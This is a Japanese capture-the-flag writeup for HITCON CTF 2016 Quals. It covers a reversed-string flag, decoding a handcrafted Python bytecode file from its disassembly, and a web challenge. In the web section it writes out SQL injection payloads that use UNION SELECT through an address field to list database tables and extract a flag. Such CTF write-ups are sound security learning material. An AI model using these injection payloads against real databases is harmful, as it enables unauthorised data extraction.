読者です 読者をやめる 読者になる 読者になる

HITCON CTF 2016 Quals Writeup

CTF writeup

この大会は2016/10/8 11:00(JST)~2016/10/10 11:00(JST)に開催されました。
今回もチームで参戦。結果は150点で1024チーム中226位でした。
自分で解けた問題をWriteupとして書いておきます。

Welcome (Reverse 50)

文字列を逆に読めばよい。

hitcon{Welcome to HITCON CTF}

Handcrafted pyc (Reverse 50)

pycのヘッダを付けてcrackme.pycを作成する。

#!/usr/bin/env python
import marshal, zlib, base64

PYC_HEADER = '\x03\xf3\x0d\x0a\x14\x0c\xf4\x57'

data = zlib.decompress(base64.b64decode('eJyNVktv00AQXm/eL0igiaFA01IO4cIVCUGFBBJwqRAckLhEIQmtRfPwI0QIeio/hRO/hJ/CiStH2M/prj07diGRP43Hs9+MZ2fWMxbnP6mux+oK9xVMHPFViLdCTB0xkeKDFEFfTIU4E8KZq8dCvB4UlN3hGEsdddXU9QTLv1eFiGKGM4cKUgsFCNLFH7dFrS9poayFYmIZm1b0gyqxMOwJaU3r6xs9sW1ooakXuRv+un7Q0sIlLVzOCZq/XtsK2oTSYaZlStogXi1HV0iazoN2CV2HZeXqRQ54TlJRb7FUlKyUatISsdzo+P7UU1Gb1POdMruckepGwk9tIXQTftz2yBaT5JQovWvpSa6poJPuqgao+b9l5Aj/R+mLQIP4f6Q8Vb3g/5TB/TJxWGdZr9EQrmn99fwKtTvAZGU7wzS7GNpZpDm2JgCrr8wrmPoo54UqGampFIeS9ojXjc4E2yI06bq/4DRoUAc0nVnng4k6p7Ks0+j/S8z9V+NZ5dhmrJUM/y7JTJeRtnJ2TSYJvsFq3CQt/vnfqmQXt5KlpuRcIvDAmhnn2E0t9BJ3SvB/SfLWhuOWNiNVZ+h28g4wlwUp00w95si43rZ3r6+fUIEdgOZbQAsyFRRvBR6dla8KCzRdslar7WS+a5HFb39peIAmG7uZTHVm17Czxju4m6bayz8e7J40DzqM0jr0bmv9PmPvk6y5z57HU8wdTDHeiUJvBMAM4+0CpoAZ4BPgJeAYEAHmgAUgAHiAj4AVAGORtwd4AVgC3gEmgBBwCPgMWANOAQ8AbwBHgHuAp4D3gLuARwoGmNUizF/j4yDC5BWM1kNvvlxFA8xikRrBxHIUhutFMBlgQoshhPphGAXe/OggKqqb2cibxwuEXjUcQjccxi5eFRL1fDSbKrUhy2CMb2aLyepkegDWsBwPlrVC0/kLHmeCBQ=='))

data = PYC_HEADER + data

with open('crackme.pyc', 'wb') as f:
    f.write(data)

Easy Python Decompilerでデコンパイルできない。uncompyle2も試したけど、結果は同じ。https://github.com/ershov/pycdumpのツールでディスアセンブルする。

>python pycdis.py crackme.pyc > crackme_asm.txt

               :
            741 000342: 02E5: |71 F7 02| JUMP_ABSOLUTE          759
        >>  744 000345: 02E8: |74 01 00| LOAD_GLOBAL              1 (raw_input)
            747 000348: 02EB: |71 C8 05| JUMP_ABSOLUTE         1480
        >>  750 00034B: 02EE: |7C 00 00| LOAD_FAST                0 (password)
            753 00034E: 02F1: |6B 02 00| COMPARE_OP               2 (==)
            756 000351: 02F4: |71 FF 02| JUMP_ABSOLUTE          767
        >>  759 000354: 02F7: |02      | ROT_TWO             
            760 000355: 02F8: |7D 00 00| STORE_FAST               0 (password)
            763 000358: 02FB: |01      | POP_TOP             
            764 000359: 02FC: |71 E8 02| JUMP_ABSOLUTE          744
        >>  767 00035C: 02FF: |72 37 06| POP_JUMP_IF_FALSE     1591
            770 00035F: 0302: |74 00 00| LOAD_GLOBAL              0 (chr)
            773 000362: 0305: |64 11 00| LOAD_CONST              17 (99)
            776 000365: 0308: |83 01 00| CALL_FUNCTION            1
            779 000368: 030B: |74 00 00| LOAD_GLOBAL              0 (chr)
            782 00036B: 030E: |64 0A 00| LOAD_CONST              10 (116)
            785 00036E: 0311: |83 01 00| CALL_FUNCTION            1
            788 000371: 0314: |74 00 00| LOAD_GLOBAL              0 (chr)
            791 000374: 0317: |64 0E 00| LOAD_CONST              14 (105)
            794 000377: 031A: |83 01 00| CALL_FUNCTION            1
            797 00037A: 031D: |74 00 00| LOAD_GLOBAL              0 (chr)
            800 00037D: 0320: |64 09 00| LOAD_CONST               9 (104)
            803 000380: 0323: |83 01 00| CALL_FUNCTION            1
            806 000383: 0326: |02      | ROT_TWO             
            807 000384: 0327: |17      | BINARY_ADD          
            808 000385: 0328: |02      | ROT_TWO             
            809 000386: 0329: |17      | BINARY_ADD          
            810 000387: 032A: |02      | ROT_TWO             
            811 000388: 032B: |17      | BINARY_ADD          
            812 000389: 032C: |74 00 00| LOAD_GLOBAL              0 (chr)
            815 00038C: 032F: |64 18 00| LOAD_CONST              24 (78)
            818 00038F: 0332: |83 01 00| CALL_FUNCTION            1
            821 000392: 0335: |74 00 00| LOAD_GLOBAL              0 (chr)
            824 000395: 0338: |64 19 00| LOAD_CONST              25 (123)
            827 000398: 033B: |83 01 00| CALL_FUNCTION            1
            830 00039B: 033E: |74 00 00| LOAD_GLOBAL              0 (chr)
            833 00039E: 0341: |64 0B 00| LOAD_CONST              11 (110)
            836 0003A1: 0344: |83 01 00| CALL_FUNCTION            1
            839 0003A4: 0347: |74 00 00| LOAD_GLOBAL              0 (chr)
            842 0003A7: 034A: |64 0C 00| LOAD_CONST              12 (111)
            845 0003AA: 034D: |83 01 00| CALL_FUNCTION            1
            848 0003AD: 0350: |02      | ROT_TWO             
            849 0003AE: 0351: |17      | BINARY_ADD          
            850 0003AF: 0352: |02      | ROT_TWO             
            851 0003B0: 0353: |17      | BINARY_ADD          
            852 0003B1: 0354: |02      | ROT_TWO             
            853 0003B2: 0355: |17      | BINARY_ADD          
            854 0003B3: 0356: |17      | BINARY_ADD          
            855 0003B4: 0357: |74 00 00| LOAD_GLOBAL              0 (chr)
            858 0003B7: 035A: |64 07 00| LOAD_CONST               7 (121)
            861 0003BA: 035D: |83 01 00| CALL_FUNCTION            1
            864 0003BD: 0360: |74 00 00| LOAD_GLOBAL              0 (chr)
            867 0003C0: 0363: |64 04 00| LOAD_CONST               4 (32)
            870 0003C3: 0366: |83 01 00| CALL_FUNCTION            1
            873 0003C6: 0369: |74 00 00| LOAD_GLOBAL              0 (chr)
            876 0003C9: 036C: |64 1A 00| LOAD_CONST              26 (119)
            879 0003CC: 036F: |83 01 00| CALL_FUNCTION            1
            882 0003CF: 0372: |74 00 00| LOAD_GLOBAL              0 (chr)
            885 0003D2: 0375: |64 0C 00| LOAD_CONST              12 (111)
            888 0003D5: 0378: |83 01 00| CALL_FUNCTION            1
            891 0003D8: 037B: |02      | ROT_TWO             
            892 0003D9: 037C: |17      | BINARY_ADD          
            893 0003DA: 037D: |02      | ROT_TWO             
            894 0003DB: 037E: |17      | BINARY_ADD          
            895 0003DC: 037F: |02      | ROT_TWO             
            896 0003DD: 0380: |17      | BINARY_ADD          
            897 0003DE: 0381: |74 00 00| LOAD_GLOBAL              0 (chr)
            900 0003E1: 0384: |64 11 00| LOAD_CONST              17 (99)
            903 0003E4: 0387: |83 01 00| CALL_FUNCTION            1
            906 0003E7: 038A: |74 00 00| LOAD_GLOBAL              0 (chr)
            909 0003EA: 038D: |64 04 00| LOAD_CONST               4 (32)
            912 0003ED: 0390: |83 01 00| CALL_FUNCTION            1
            915 0003F0: 0393: |74 00 00| LOAD_GLOBAL              0 (chr)
            918 0003F3: 0396: |64 10 00| LOAD_CONST              16 (117)
            921 0003F6: 0399: |83 01 00| CALL_FUNCTION            1
            924 0003F9: 039C: |74 00 00| LOAD_GLOBAL              0 (chr)
            927 0003FC: 039F: |64 0C 00| LOAD_CONST              12 (111)
            930 0003FF: 03A2: |83 01 00| CALL_FUNCTION            1
            933 000402: 03A5: |02      | ROT_TWO             
            934 000403: 03A6: |17      | BINARY_ADD          
            935 000404: 03A7: |02      | ROT_TWO             
            936 000405: 03A8: |17      | BINARY_ADD          
            937 000406: 03A9: |02      | ROT_TWO             
            938 000407: 03AA: |17      | BINARY_ADD          
            939 000408: 03AB: |17      | BINARY_ADD          
            940 000409: 03AC: |17      | BINARY_ADD          
            941 00040A: 03AD: |74 00 00| LOAD_GLOBAL              0 (chr)
            944 00040D: 03B0: |64 11 00| LOAD_CONST              17 (99)
            947 000410: 03B3: |83 01 00| CALL_FUNCTION            1
            950 000413: 03B6: |74 00 00| LOAD_GLOBAL              0 (chr)
            953 000416: 03B9: |64 04 00| LOAD_CONST               4 (32)
            956 000419: 03BC: |83 01 00| CALL_FUNCTION            1
            959 00041C: 03BF: |74 00 00| LOAD_GLOBAL              0 (chr)
            962 00041F: 03C2: |64 0B 00| LOAD_CONST              11 (110)
            965 000422: 03C5: |83 01 00| CALL_FUNCTION            1
            968 000425: 03C8: |74 00 00| LOAD_GLOBAL              0 (chr)
            971 000428: 03CB: |64 02 00| LOAD_CONST               2 (97)
            974 00042B: 03CE: |83 01 00| CALL_FUNCTION            1
            977 00042E: 03D1: |02      | ROT_TWO             
            978 00042F: 03D2: |17      | BINARY_ADD          
            979 000430: 03D3: |02      | ROT_TWO             
            980 000431: 03D4: |17      | BINARY_ADD          
            981 000432: 03D5: |02      | ROT_TWO             
            982 000433: 03D6: |17      | BINARY_ADD          
            983 000434: 03D7: |74 00 00| LOAD_GLOBAL              0 (chr)
            986 000437: 03DA: |64 0E 00| LOAD_CONST              14 (105)
            989 00043A: 03DD: |83 01 00| CALL_FUNCTION            1
            992 00043D: 03E0: |74 00 00| LOAD_GLOBAL              0 (chr)
            995 000440: 03E3: |64 14 00| LOAD_CONST              20 (112)
            998 000443: 03E6: |83 01 00| CALL_FUNCTION            1
           1001 000446: 03E9: |74 00 00| LOAD_GLOBAL              0 (chr)
           1004 000449: 03EC: |64 06 00| LOAD_CONST               6 (109)
           1007 00044C: 03EF: |83 01 00| CALL_FUNCTION            1
           1010 00044F: 03F2: |74 00 00| LOAD_GLOBAL              0 (chr)
           1013 000452: 03F5: |64 0C 00| LOAD_CONST              12 (111)
           1016 000455: 03F8: |83 01 00| CALL_FUNCTION            1
           1019 000458: 03FB: |02      | ROT_TWO             
           1020 000459: 03FC: |17      | BINARY_ADD          
           1021 00045A: 03FD: |02      | ROT_TWO             
           1022 00045B: 03FE: |17      | BINARY_ADD          
           1023 00045C: 03FF: |02      | ROT_TWO             
           1024 00045D: 0400: |17      | BINARY_ADD          
           1025 00045E: 0401: |17      | BINARY_ADD          
           1026 00045F: 0402: |74 00 00| LOAD_GLOBAL              0 (chr)
           1029 000462: 0405: |64 02 00| LOAD_CONST               2 (97)
           1032 000465: 0408: |83 01 00| CALL_FUNCTION            1
           1035 000468: 040B: |74 00 00| LOAD_GLOBAL              0 (chr)
           1038 00046B: 040E: |64 04 00| LOAD_CONST               4 (32)
           1041 00046E: 0411: |83 01 00| CALL_FUNCTION            1
           1044 000471: 0414: |74 00 00| LOAD_GLOBAL              0 (chr)
           1047 000474: 0417: |64 05 00| LOAD_CONST               5 (101)
           1050 000477: 041A: |83 01 00| CALL_FUNCTION            1
           1053 00047A: 041D: |74 00 00| LOAD_GLOBAL              0 (chr)
           1056 00047D: 0420: |64 01 00| LOAD_CONST               1 (108)
           1059 000480: 0423: |83 01 00| CALL_FUNCTION            1
           1062 000483: 0426: |02      | ROT_TWO             
           1063 000484: 0427: |17      | BINARY_ADD          
           1064 000485: 0428: |02      | ROT_TWO             
           1065 000486: 0429: |17      | BINARY_ADD          
           1066 000487: 042A: |02      | ROT_TWO             
           1067 000488: 042B: |17      | BINARY_ADD          
           1068 000489: 042C: |74 00 00| LOAD_GLOBAL              0 (chr)
           1071 00048C: 042F: |64 16 00| LOAD_CONST              22 (100)
           1074 00048F: 0432: |83 01 00| CALL_FUNCTION            1
           1077 000492: 0435: |74 00 00| LOAD_GLOBAL              0 (chr)
           1080 000495: 0438: |64 0B 00| LOAD_CONST              11 (110)
           1083 000498: 043B: |83 01 00| CALL_FUNCTION            1
           1086 00049B: 043E: |02      | ROT_TWO             
           1087 00049C: 043F: |17      | BINARY_ADD          
           1088 00049D: 0440: |74 00 00| LOAD_GLOBAL              0 (chr)
           1091 0004A0: 0443: |64 10 00| LOAD_CONST              16 (117)
           1094 0004A3: 0446: |83 01 00| CALL_FUNCTION            1
           1097 0004A6: 0449: |74 00 00| LOAD_GLOBAL              0 (chr)
           1100 0004A9: 044C: |64 0D 00| LOAD_CONST              13 (114)
           1103 0004AC: 044F: |83 01 00| CALL_FUNCTION            1
           1106 0004AF: 0452: |74 00 00| LOAD_GLOBAL              0 (chr)
           1109 0004B2: 0455: |64 04 00| LOAD_CONST               4 (32)
           1112 0004B5: 0458: |83 01 00| CALL_FUNCTION            1
           1115 0004B8: 045B: |02      | ROT_TWO             
           1116 0004B9: 045C: |17      | BINARY_ADD          
           1117 0004BA: 045D: |02      | ROT_TWO             
           1118 0004BB: 045E: |17      | BINARY_ADD          
           1119 0004BC: 045F: |17      | BINARY_ADD          
           1120 0004BD: 0460: |17      | BINARY_ADD          
           1121 0004BE: 0461: |17      | BINARY_ADD          
           1122 0004BF: 0462: |17      | BINARY_ADD          
           1123 0004C0: 0463: |74 00 00| LOAD_GLOBAL              0 (chr)
           1126 0004C3: 0466: |64 07 00| LOAD_CONST               7 (121)
           1129 0004C6: 0469: |83 01 00| CALL_FUNCTION            1
           1132 0004C9: 046C: |74 00 00| LOAD_GLOBAL              0 (chr)
           1135 0004CC: 046F: |64 08 00| LOAD_CONST               8 (80)
           1138 0004CF: 0472: |83 01 00| CALL_FUNCTION            1
           1141 0004D2: 0475: |74 00 00| LOAD_GLOBAL              0 (chr)
           1144 0004D5: 0478: |64 04 00| LOAD_CONST               4 (32)
           1147 0004D8: 047B: |83 01 00| CALL_FUNCTION            1
           1150 0004DB: 047E: |74 00 00| LOAD_GLOBAL              0 (chr)
           1153 0004DE: 0481: |64 0B 00| LOAD_CONST              11 (110)
           1156 0004E1: 0484: |83 01 00| CALL_FUNCTION            1
           1159 0004E4: 0487: |02      | ROT_TWO             
           1160 0004E5: 0488: |17      | BINARY_ADD          
           1161 0004E6: 0489: |02      | ROT_TWO             
           1162 0004E7: 048A: |17      | BINARY_ADD          
           1163 0004E8: 048B: |02      | ROT_TWO             
           1164 0004E9: 048C: |17      | BINARY_ADD          
           1165 0004EA: 048D: |74 00 00| LOAD_GLOBAL              0 (chr)
           1168 0004ED: 0490: |64 0B 00| LOAD_CONST              11 (110)
           1171 0004F0: 0493: |83 01 00| CALL_FUNCTION            1
           1174 0004F3: 0496: |74 00 00| LOAD_GLOBAL              0 (chr)
           1177 0004F6: 0499: |64 0C 00| LOAD_CONST              12 (111)
           1180 0004F9: 049C: |83 01 00| CALL_FUNCTION            1
           1183 0004FC: 049F: |74 00 00| LOAD_GLOBAL              0 (chr)
           1186 0004FF: 04A2: |64 09 00| LOAD_CONST               9 (104)
           1189 000502: 04A5: |83 01 00| CALL_FUNCTION            1
           1192 000505: 04A8: |74 00 00| LOAD_GLOBAL              0 (chr)
           1195 000508: 04AB: |64 0A 00| LOAD_CONST              10 (116)
           1198 00050B: 04AE: |83 01 00| CALL_FUNCTION            1
           1201 00050E: 04B1: |02      | ROT_TWO             
           1202 00050F: 04B2: |17      | BINARY_ADD          
           1203 000510: 04B3: |02      | ROT_TWO             
           1204 000511: 04B4: |17      | BINARY_ADD          
           1205 000512: 04B5: |02      | ROT_TWO             
           1206 000513: 04B6: |17      | BINARY_ADD          
           1207 000514: 04B7: |17      | BINARY_ADD          
           1208 000515: 04B8: |74 00 00| LOAD_GLOBAL              0 (chr)
           1211 000518: 04BB: |64 0A 00| LOAD_CONST              10 (116)
           1214 00051B: 04BE: |83 01 00| CALL_FUNCTION            1
           1217 00051E: 04C1: |74 00 00| LOAD_GLOBAL              0 (chr)
           1220 000521: 04C4: |64 07 00| LOAD_CONST               7 (121)
           1223 000524: 04C7: |83 01 00| CALL_FUNCTION            1
           1226 000527: 04CA: |74 00 00| LOAD_GLOBAL              0 (chr)
           1229 00052A: 04CD: |64 15 00| LOAD_CONST              21 (98)
           1232 00052D: 04D0: |83 01 00| CALL_FUNCTION            1
           1235 000530: 04D3: |74 00 00| LOAD_GLOBAL              0 (chr)
           1238 000533: 04D6: |64 04 00| LOAD_CONST               4 (32)
           1241 000536: 04D9: |83 01 00| CALL_FUNCTION            1
           1244 000539: 04DC: |02      | ROT_TWO             
           1245 00053A: 04DD: |17      | BINARY_ADD          
           1246 00053B: 04DE: |02      | ROT_TWO             
           1247 00053C: 04DF: |17      | BINARY_ADD          
           1248 00053D: 04E0: |02      | ROT_TWO             
           1249 00053E: 04E1: |17      | BINARY_ADD          
           1250 00053F: 04E2: |74 00 00| LOAD_GLOBAL              0 (chr)
           1253 000542: 04E5: |64 16 00| LOAD_CONST              22 (100)
           1256 000545: 04E8: |83 01 00| CALL_FUNCTION            1
           1259 000548: 04EB: |74 00 00| LOAD_GLOBAL              0 (chr)
           1262 00054B: 04EE: |64 0C 00| LOAD_CONST              12 (111)
           1265 00054E: 04F1: |83 01 00| CALL_FUNCTION            1
           1268 000551: 04F4: |74 00 00| LOAD_GLOBAL              0 (chr)
           1271 000554: 04F7: |64 11 00| LOAD_CONST              17 (99)
           1274 000557: 04FA: |83 01 00| CALL_FUNCTION            1
           1277 00055A: 04FD: |74 00 00| LOAD_GLOBAL              0 (chr)
           1280 00055D: 0500: |64 05 00| LOAD_CONST               5 (101)
           1283 000560: 0503: |83 01 00| CALL_FUNCTION            1
           1286 000563: 0506: |02      | ROT_TWO             
           1287 000564: 0507: |17      | BINARY_ADD          
           1288 000565: 0508: |02      | ROT_TWO             
           1289 000566: 0509: |17      | BINARY_ADD          
           1290 000567: 050A: |02      | ROT_TWO             
           1291 000568: 050B: |17      | BINARY_ADD          
           1292 000569: 050C: |17      | BINARY_ADD          
           1293 00056A: 050D: |17      | BINARY_ADD          
           1294 00056B: 050E: |74 00 00| LOAD_GLOBAL              0 (chr)
           1297 00056E: 0511: |64 0B 00| LOAD_CONST              11 (110)
           1300 000571: 0514: |83 01 00| CALL_FUNCTION            1
           1303 000574: 0517: |74 00 00| LOAD_GLOBAL              0 (chr)
           1306 000577: 051A: |64 0E 00| LOAD_CONST              14 (105)
           1309 00057A: 051D: |83 01 00| CALL_FUNCTION            1
           1312 00057D: 0520: |74 00 00| LOAD_GLOBAL              0 (chr)
           1315 000580: 0523: |64 04 00| LOAD_CONST               4 (32)
           1318 000583: 0526: |83 01 00| CALL_FUNCTION            1
           1321 000586: 0529: |74 00 00| LOAD_GLOBAL              0 (chr)
           1324 000589: 052C: |64 05 00| LOAD_CONST               5 (101)
           1327 00058C: 052F: |83 01 00| CALL_FUNCTION            1
           1330 00058F: 0532: |02      | ROT_TWO             
           1331 000590: 0533: |17      | BINARY_ADD          
           1332 000591: 0534: |02      | ROT_TWO             
           1333 000592: 0535: |17      | BINARY_ADD          
           1334 000593: 0536: |02      | ROT_TWO             
           1335 000594: 0537: |17      | BINARY_ADD          
           1336 000595: 0538: |74 00 00| LOAD_GLOBAL              0 (chr)
           1339 000598: 053B: |64 10 00| LOAD_CONST              16 (117)
           1342 00059B: 053E: |83 01 00| CALL_FUNCTION            1
           1345 00059E: 0541: |74 00 00| LOAD_GLOBAL              0 (chr)
           1348 0005A1: 0544: |64 0C 00| LOAD_CONST              12 (111)
           1351 0005A4: 0547: |83 01 00| CALL_FUNCTION            1
           1354 0005A7: 054A: |74 00 00| LOAD_GLOBAL              0 (chr)
           1357 0005AA: 054D: |64 07 00| LOAD_CONST               7 (121)
           1360 0005AD: 0550: |83 01 00| CALL_FUNCTION            1
           1363 0005B0: 0553: |74 00 00| LOAD_GLOBAL              0 (chr)
           1366 0005B3: 0556: |64 04 00| LOAD_CONST               4 (32)
           1369 0005B6: 0559: |83 01 00| CALL_FUNCTION            1
           1372 0005B9: 055C: |02      | ROT_TWO             
           1373 0005BA: 055D: |17      | BINARY_ADD          
           1374 0005BB: 055E: |02      | ROT_TWO             
           1375 0005BC: 055F: |17      | BINARY_ADD          
           1376 0005BD: 0560: |02      | ROT_TWO             
           1377 0005BE: 0561: |17      | BINARY_ADD          
           1378 0005BF: 0562: |17      | BINARY_ADD          
           1379 0005C0: 0563: |74 00 00| LOAD_GLOBAL              0 (chr)
           1382 0005C3: 0566: |64 0D 00| LOAD_CONST              13 (114)
           1385 0005C6: 0569: |83 01 00| CALL_FUNCTION            1
           1388 0005C9: 056C: |74 00 00| LOAD_GLOBAL              0 (chr)
           1391 0005CC: 056F: |64 15 00| LOAD_CONST              21 (98)
           1394 0005CF: 0572: |83 01 00| CALL_FUNCTION            1
           1397 0005D2: 0575: |74 00 00| LOAD_GLOBAL              0 (chr)
           1400 0005D5: 0578: |64 04 00| LOAD_CONST               4 (32)
           1403 0005D8: 057B: |83 01 00| CALL_FUNCTION            1
           1406 0005DB: 057E: |74 00 00| LOAD_GLOBAL              0 (chr)
           1409 0005DE: 0581: |64 0D 00| LOAD_CONST              13 (114)
           1412 0005E1: 0584: |83 01 00| CALL_FUNCTION            1
           1415 0005E4: 0587: |02      | ROT_TWO             
           1416 0005E5: 0588: |17      | BINARY_ADD          
           1417 0005E6: 0589: |02      | ROT_TWO             
           1418 0005E7: 058A: |17      | BINARY_ADD          
           1419 0005E8: 058B: |02      | ROT_TWO             
           1420 0005E9: 058C: |17      | BINARY_ADD          
           1421 0005EA: 058D: |74 00 00| LOAD_GLOBAL              0 (chr)
           1424 0005ED: 0590: |64 0E 00| LOAD_CONST              14 (105)
           1427 0005F0: 0593: |83 01 00| CALL_FUNCTION            1
           1430 0005F3: 0596: |74 00 00| LOAD_GLOBAL              0 (chr)
           1433 0005F6: 0599: |64 02 00| LOAD_CONST               2 (97)
           1436 0005F9: 059C: |83 01 00| CALL_FUNCTION            1
           1439 0005FC: 059F: |02      | ROT_TWO             
           1440 0005FD: 05A0: |17      | BINARY_ADD          
           1441 0005FE: 05A1: |74 00 00| LOAD_GLOBAL              0 (chr)
           1444 000601: 05A4: |64 1B 00| LOAD_CONST              27 (125)
           1447 000604: 05A7: |83 01 00| CALL_FUNCTION            1
           1450 000607: 05AA: |74 00 00| LOAD_GLOBAL              0 (chr)
           1453 00060A: 05AD: |64 12 00| LOAD_CONST              18 (33)
           1456 00060D: 05B0: |83 01 00| CALL_FUNCTION            1
           1459 000610: 05B3: |74 00 00| LOAD_GLOBAL              0 (chr)
           1462 000613: 05B6: |64 0B 00| LOAD_CONST              11 (110)
           1465 000616: 05B9: |83 01 00| CALL_FUNCTION            1
           1468 000619: 05BC: |02      | ROT_TWO             
           1469 00061A: 05BD: |17      | BINARY_ADD          
           1470 00061B: 05BE: |02      | ROT_TWO             
           1471 00061C: 05BF: |17      | BINARY_ADD          
           1472 00061D: 05C0: |17      | BINARY_ADD          
           1473 00061E: 05C1: |17      | BINARY_ADD          
           1474 00061F: 05C2: |17      | BINARY_ADD          
           1475 000620: 05C3: |17      | BINARY_ADD          
           1476 000621: 05C4: |17      | BINARY_ADD          
               :

パスワード入力付近に比較部分があり、ASCIIコードが並んでいる。
以下、それぞれ塊ごとに逆順で読み込めば、フラグになりそう。

99 116 105 104
78 123 110 111
121 32 119 111
99 32 117 111
99 32 110 97
105 112 109 111
97 32 101 108
100 110
117 114 32
121 80 32 110
110 111 104 116
116 121 98 32
100 111 99 101
110 105 32 101
117 111 121 32
114 98 32 114
105 97
125 33 110

上記をcodes.txtに保存して、以下のコードを実行する。

with open('codes.txt', 'r') as f:
    lines = f.readlines()

flag = ''
for line in lines:
    codes = line.strip('\n').split(' ')
    s = ''
    for code in codes:
        s += chr(int(code))
    flag += s[::-1]

print flag
hitcon{Now you can compile and run Python bytecode in your brain!}

Are you rich? (Web 50)

SQLインジェクションが可能。
Address欄にlimitで何番目の情報を得るか調整しながら、情報を得る。

Address:
18Tx7MqRaUfkejuZT2h4DstD6CjemxvZ9E' union select table_name from INFORMATION_SCHEMA.TABLES limit 62,1 #
        ↓
Error!: Remote API server reject your invalid address 'flag1'. If your address is valid, please PM @cebrusfs or other admin on IRC.

Address:
18Tx7MqRaUfkejuZT2h4DstD6CjemxvZ9E' union select flag from flag1 limit 1,1 #
        ↓
Error!: Remote API server reject your invalid address 'hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}'. If your address is valid, please PM @cebrusfs or other admin on IRC.
hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}